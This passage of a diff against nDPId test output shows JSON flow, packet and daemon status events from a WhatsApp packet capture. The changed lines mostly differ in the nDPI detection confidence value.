+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655113084330,"flow_last_seen":1655113084612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1655113084612,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105188559,"flow_last_seen":1655105188835,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":302,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655113084909,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":656,"packets-processed":655,"total-skipped-flows":0,"total-l4-payload-len":48424,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":83,"total-detection-updates":0,"total-updates":0,"current-active-flows":14,"total-active-flows":83,"total-idle-flows":69,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":544,"global_ts_msec":1655114622076} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655114622076,"flow_last_seen":1655114622076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655114622076,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1655114622076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655114622076,"pkt":"eJS0JASgYDjgxTWgCABFAAA8E3JAAD8G7t\/AqAJkszzDIbi0FGYRoZALAAAAAKAC\/\/83+QAAAgQFtAQCCAoGqmEpAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1655114622106,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655114622106,"pkt":"eJS0JASgYDjgxTWgCABFAAA0E3NAAD8G7ubAqAJkszzDIbi0FGYRoZAMgQqHroAQAKz9CwAAAQEICgaqYVZ8b+Op"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1655114622112,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655114622112,"pkt":"eJS0JASgYDjgxTWgCABFAAA4E3RAAD8G7uHAqAJkszzDIbi0FGYRoZAMgQqHroAYAKy3tQAAAQEICgaqYVt8b+OpRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655114622076,"flow_last_seen":1655114622114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655114622114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105755895,"flow_last_seen":1655105756270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655114622275,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105790019,"flow_last_seen":1655105790289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655114622275,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655114622076,"flow_last_seen":1655114622114,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655114622114,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105755895,"flow_last_seen":1655105756270,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655114622275,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655105790019,"flow_last_seen":1655105790289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655114622275,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":664,"packets-processed":663,"total-skipped-flows":0,"total-l4-payload-len":49697,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":84,"total-detection-updates":0,"total-updates":0,"current-active-flows":13,"total-active-flows":84,"total-idle-flows":71,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":552,"global_ts_msec":1655116217773} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655116217773,"flow_last_seen":1655116217773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655116217773,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1655116217773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655116217773,"pkt":"eJS0JASgYDjgxTWgCABFAAA8AehAAD8GAFrAqAJkszzDMZmmFGbbOiylAAAAAKAC\/\/9QjQAAAgQFtAQCCApyEZX4AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1655116217805,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655116217805,"pkt":"eJS0JASgYDjgxTWgCABFAAA0AelAAD8GAGHAqAJkszzDMZmmFGbbOiymFXtouYAQAIBHtQAAAQEICnIRlijWRuJq"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":3,"flow_last_seen":1655116217850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655116217850,"pkt":"eJS0JASgYDjgxTWgCABFAAA4AepAAD8GAFzAqAJkszzDMZmmFGbbOiymFXtouYAYAIACNwAAAQEICnIRllXWRuJqRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655116217773,"flow_last_seen":1655116217880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655116217880,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108001441,"flow_last_seen":1655108001999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":518,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108385462,"flow_last_seen":1655108385787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108453657,"flow_last_seen":1655108453928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":667,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655116217773,"flow_last_seen":1655116217880,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655116217880,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108001441,"flow_last_seen":1655108001999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":518,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108385462,"flow_last_seen":1655108385787,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108453657,"flow_last_seen":1655108453928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1655116218131,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":672,"packets-processed":671,"total-skipped-flows":0,"total-l4-payload-len":50313,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":85,"total-detection-updates":0,"total-updates":0,"current-active-flows":11,"total-active-flows":85,"total-idle-flows":74,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":561,"global_ts_msec":1655116940904} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655116940904,"flow_last_seen":1655116940904,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655116940904,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1655116940904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655116940904,"pkt":"eJS0JASgYDjgxTWgCABFAAA890NAAD8GCv7AqAJkszzDMZxGFGZlwIwQAAAAAKAC\/\/9j2AAAAgQFtAQCCApyHJYRAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1655116940935,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655116940935,"pkt":"eJS0JASgYDjgxTWgCABFAAA090RAAD8GCwXAqAJkszzDMZxGFGZlwIwR5J7sZYAQAIAZ6gAAAQEICnIclkN2QDC1"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1655116940973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655116940973,"pkt":"eJS0JASgYDjgxTWgCABFAAA490VAAD8GCwDAqAJkszzDMZxGFGZlwIwR5J7sZYAYAIDUcQAAAQEICnIclmp2QDC1RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655116940904,"flow_last_seen":1655116941004,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655116941004,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655114622076,"flow_last_seen":1655114622275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":47284,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655116217773,"flow_last_seen":1655116218131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":39334,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655108977493,"flow_last_seen":1655108978075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655109656108,"flow_last_seen":1655109656661,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47776,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1655111789393,"flow_last_seen":1655111789765,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":323,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47810,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111268965,"flow_last_seen":1655111269503,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37674,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655110961423,"flow_last_seen":1655110962551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37766,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111980061,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37822,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655116940904,"flow_last_seen":1655116941291,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":40006,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111826253,"flow_last_seen":1655111826511,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46394,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655113084330,"flow_last_seen":1655113084909,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":38234,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":679,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655111980926,"flow_last_seen":1655111980926,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655116941291,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":46576,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 